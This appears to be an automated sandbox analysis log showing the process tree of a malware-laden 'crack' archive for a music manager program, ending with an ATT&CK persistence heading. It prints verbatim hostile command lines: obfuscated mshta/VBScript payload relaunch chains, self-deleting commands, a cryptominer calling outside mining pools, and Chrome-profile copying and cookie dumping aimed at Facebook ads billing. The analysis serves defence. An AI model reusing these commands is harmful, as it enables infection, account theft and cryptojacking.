                                                                                                                      "c:\users\admin\appdata\local\google\chrome\user data\swreporter\89.259.200\software_reporter_tool.exe" --use-crash-handler-with-id="\\.\pipe\crashpad_4872_ROSTLUWIEXLVAYMC" --sandboxed-process-id=3 --init-done-notifier=916 --sandbox-mojo-pipe-token=6240349677436073014 --mojo-platform-channel-handle=912
                                                                                                                      3⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:4456
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1496 /prefetch:8
                                                                                                                    2⤵
                                                                                                                      PID:4136
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1672 /prefetch:2
                                                                                                                      2⤵
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      PID:4244
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,866123106804310179,17333088275408446648,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2488 /prefetch:8
                                                                                                                      2⤵
                                                                                                                        PID:2264
                                                                                                                    • c:\windows\system32\svchost.exe
                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s Browser
                                                                                                                      1⤵
                                                                                                                        PID:2756
                                                                                                                      • c:\windows\system32\svchost.exe
                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                                                                                                        1⤵
                                                                                                                          PID:2608
                                                                                                                        • c:\windows\system32\svchost.exe
                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                                                                                                          1⤵
                                                                                                                            PID:2576
                                                                                                                          • c:\windows\system32\svchost.exe
                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                                                                                            1⤵
                                                                                                                              PID:1908
                                                                                                                            • c:\windows\system32\svchost.exe
                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                                                                                                              1⤵
                                                                                                                                PID:1428
                                                                                                                              • c:\windows\system32\svchost.exe
                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                                                                                                                1⤵
                                                                                                                                  PID:1376
                                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                                                                                                                  1⤵
                                                                                                                                    PID:1180
                                                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                                                                                    1⤵
                                                                                                                                      PID:1096
                                                                                                                                    • c:\windows\system32\svchost.exe
                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                                                                      1⤵
                                                                                                                                        PID:68
                                                                                                                                      • c:\windows\system32\svchost.exe
                                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                                                                        1⤵
                                                                                                                                          PID:340
                                                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                          1⤵
                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                          • Modifies registry class
                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:1120
                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                            C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                            2⤵
                                                                                                                                            • Drops file in System32 directory
                                                                                                                                            • Checks processor information in registry
                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                            • Modifies registry class
                                                                                                                                            PID:4604
                                                                                                                                        • C:\Windows\System32\rundll32.exe
                                                                                                                                          C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                          1⤵
                                                                                                                                            PID:4800
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Temp2_Phatnoise.Music.Manager.all.ve.crack.zip\Phatnoise.Music.Manager.all.ve.crack.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Temp2_Phatnoise.Music.Manager.all.ve.crack.zip\Phatnoise.Music.Manager.all.ve.crack.exe"
                                                                                                                                            1⤵
                                                                                                                                              PID:2104
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
                                                                                                                                                2⤵
                                                                                                                                                  PID:1036
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                                                                                                                                    keygen-pr.exe -p83fsase3Ge
                                                                                                                                                    3⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:4700
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
                                                                                                                                                      4⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:3048
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
                                                                                                                                                        5⤵
                                                                                                                                                          PID:1404
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                                                                                                                                                      keygen-step-1.exe
                                                                                                                                                      3⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:4380
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe
                                                                                                                                                      keygen-step-5.exe
                                                                                                                                                      3⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:4676
                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                        "C:\Windows\System32\mshta.exe" VbscriPt: CLoSe ( CrEatEObjeCT("WsCrIPt.Shell" ). Run( "cMD.exe /C TyPe ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"" > Ehmj.exe && StArT Ehmj.exe -P85DVJ_N_WA39dHAGmL0E~ & if """"== """" for %J IN ( ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"" ) do taskkill -IM ""%~NxJ"" -F > NuL " ,0 ))
                                                                                                                                                        4⤵
                                                                                                                                                          PID:4808
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C TyPe "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" >Ehmj.exe && StArT Ehmj.exe -P85DVJ_N_WA39dHAGmL0E~ & if ""== "" for %J IN ( "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" ) do taskkill -IM "%~NxJ" -F > NuL
                                                                                                                                                            5⤵
                                                                                                                                                              PID:4840
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Ehmj.exe
                                                                                                                                                                Ehmj.exe -P85DVJ_N_WA39dHAGmL0E~
                                                                                                                                                                6⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                PID:3540
                                                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                  "C:\Windows\System32\mshta.exe" VbscriPt: CLoSe ( CrEatEObjeCT("WsCrIPt.Shell" ). Run( "cMD.exe /C TyPe ""C:\Users\Admin\AppData\Local\Temp\Ehmj.exe"" > Ehmj.exe && StArT Ehmj.exe -P85DVJ_N_WA39dHAGmL0E~ & if ""-P85DVJ_N_WA39dHAGmL0E~ ""== """" for %J IN ( ""C:\Users\Admin\AppData\Local\Temp\Ehmj.exe"" ) do taskkill -IM ""%~NxJ"" -F > NuL " ,0 ))
                                                                                                                                                                  7⤵
                                                                                                                                                                    PID:4628
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C TyPe "C:\Users\Admin\AppData\Local\Temp\Ehmj.exe" >Ehmj.exe && StArT Ehmj.exe -P85DVJ_N_WA39dHAGmL0E~ & if "-P85DVJ_N_WA39dHAGmL0E~ "== "" for %J IN ( "C:\Users\Admin\AppData\Local\Temp\Ehmj.exe" ) do taskkill -IM "%~NxJ" -F > NuL
                                                                                                                                                                      8⤵
                                                                                                                                                                        PID:4384
                                                                                                                                                                    • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                      "C:\Windows\System32\regsvr32.exe" /U -s .\YFDBQ.T
                                                                                                                                                                      7⤵
                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                      • Suspicious use of NtCreateThreadExHideFromDebugger
                                                                                                                                                                      PID:2132
                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                    taskkill -IM "keygen-step-5.exe" -F
                                                                                                                                                                    6⤵
                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                    PID:4516
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
                                                                                                                                                              keygen-step-2.exe
                                                                                                                                                              3⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Modifies system certificate store
                                                                                                                                                              PID:4680
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\DFEC.tmp.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\DFEC.tmp.exe"
                                                                                                                                                                4⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                PID:804
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\DFEC.tmp.exe"
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:4316
                                                                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                      timeout /T 10 /NOBREAK
                                                                                                                                                                      6⤵
                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                      PID:4864
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:4168
                                                                                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                      ping 127.0.0.1
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Runs ping.exe
                                                                                                                                                                      PID:3576
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
                                                                                                                                                                  keygen-step-3.exe
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:4704
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:2604
                                                                                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                        ping 1.1.1.1 -n 1 -w 3000
                                                                                                                                                                        5⤵
                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                        PID:4284
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
                                                                                                                                                                    keygen-step-4.exe
                                                                                                                                                                    3⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:4940
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX2\asdw.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\asdw.exe"
                                                                                                                                                                      4⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                      PID:1248
                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        "C:\Windows\System32\rundll32.exe" "C:\Program Files\pdfsetup.dll",install
                                                                                                                                                                        5⤵
                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                        PID:5072
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
                                                                                                                                                                      4⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      PID:4780
                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\E6B2.tmp.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\E6B2.tmp.exe"
                                                                                                                                                                        5⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                        PID:4884
                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\E6B2.tmp.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\E6B2.tmp.exe"
                                                                                                                                                                          6⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                          PID:4980
                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\E8F6.tmp.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\E8F6.tmp.exe"
                                                                                                                                                                        5⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        • Adds Run key to start application
                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                        PID:4828
                                                                                                                                                                        • C:\Windows\system32\msiexec.exe
                                                                                                                                                                          -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w3935 --cpu-max-threads-hint 50 -r 9999
                                                                                                                                                                          6⤵
                                                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                                                          PID:4768
                                                                                                                                                                        • C:\Windows\system32\msiexec.exe
                                                                                                                                                                          -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w26455@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                                                                                                          6⤵
                                                                                                                                                                            PID:1384
                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
                                                                                                                                                                          5⤵
                                                                                                                                                                            PID:5104
                                                                                                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                              ping 127.0.0.1
                                                                                                                                                                              6⤵
                                                                                                                                                                              • Runs ping.exe
                                                                                                                                                                              PID:4900
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          • Drops Chrome extension
                                                                                                                                                                          PID:2592
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                            5⤵
                                                                                                                                                                              PID:4200
                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                taskkill /f /im chrome.exe
                                                                                                                                                                                6⤵
                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                PID:3028
                                                                                                                                                                            • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                              xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
                                                                                                                                                                              5⤵
                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                              • Enumerates system info in registry
                                                                                                                                                                              PID:4828
                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
                                                                                                                                                                              5⤵
                                                                                                                                                                              • Enumerates system info in registry
                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                                                              PID:4636
                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffbafb54f50,0x7ffbafb54f60,0x7ffbafb54f70
                                                                                                                                                                                6⤵
                                                                                                                                                                                  PID:4284
                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1512,15211308782437412523,3088548616586809311,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2084 /prefetch:8
                                                                                                                                                                                  6⤵
                                                                                                                                                                                    PID:4664
                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1512,15211308782437412523,3088548616586809311,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2068 /prefetch:8
                                                                                                                                                                                    6⤵
                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                    PID:2132
                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1512,15211308782437412523,3088548616586809311,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1520 /prefetch:2
                                                                                                                                                                                    6⤵
                                                                                                                                                                                      PID:5052
                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1512,15211308782437412523,3088548616586809311,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2816 /prefetch:1
                                                                                                                                                                                      6⤵
                                                                                                                                                                                        PID:1724
                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1512,15211308782437412523,3088548616586809311,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2808 /prefetch:1
                                                                                                                                                                                        6⤵
                                                                                                                                                                                          PID:4280
                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1512,15211308782437412523,3088548616586809311,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:1
                                                                                                                                                                                          6⤵
                                                                                                                                                                                            PID:5040
                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1512,15211308782437412523,3088548616586809311,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3172 /prefetch:1
                                                                                                                                                                                            6⤵
                                                                                                                                                                                              PID:3996
                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1512,15211308782437412523,3088548616586809311,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3696 /prefetch:1
                                                                                                                                                                                              6⤵
                                                                                                                                                                                                PID:664
                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1512,15211308782437412523,3088548616586809311,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3956 /prefetch:1
                                                                                                                                                                                                6⤵
                                                                                                                                                                                                  PID:4344
                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1512,15211308782437412523,3088548616586809311,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4776 /prefetch:1
                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                    PID:4100
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX2\md4_4igk.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX2\md4_4igk.exe"
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                                PID:4432
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                PID:4308
                                                                                                                                                                                                • C:\ProgramData\3224778.exe
                                                                                                                                                                                                  "C:\ProgramData\3224778.exe"
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                  PID:1292
                                                                                                                                                                                                • C:\ProgramData\7349773.exe
                                                                                                                                                                                                  "C:\ProgramData\7349773.exe"
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                                                  PID:1956
                                                                                                                                                                                                  • C:\ProgramData\Windows Host\Windows Host.exe
                                                                                                                                                                                                    "C:\ProgramData\Windows Host\Windows Host.exe"
                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    PID:1212
                                                                                                                                                                                                • C:\ProgramData\4001601.exe
                                                                                                                                                                                                  "C:\ProgramData\4001601.exe"
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                  PID:3172
                                                                                                                                                                                                  • C:\ProgramData\4001601.exe
                                                                                                                                                                                                    "{path}"
                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                    PID:4568
                                                                                                                                                                                                • C:\ProgramData\1895370.exe
                                                                                                                                                                                                  "C:\ProgramData\1895370.exe"
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                  PID:3664
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                                                PID:4624
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  PID:3184
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                  PID:4864
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                  PID:2232
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                  PID:4572

                                                                                                                                                                                        Network

                                                                                                                                                                                        MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                        Persistence

                                                                                                                                                                                        Registry Run Keys / Startup Folder

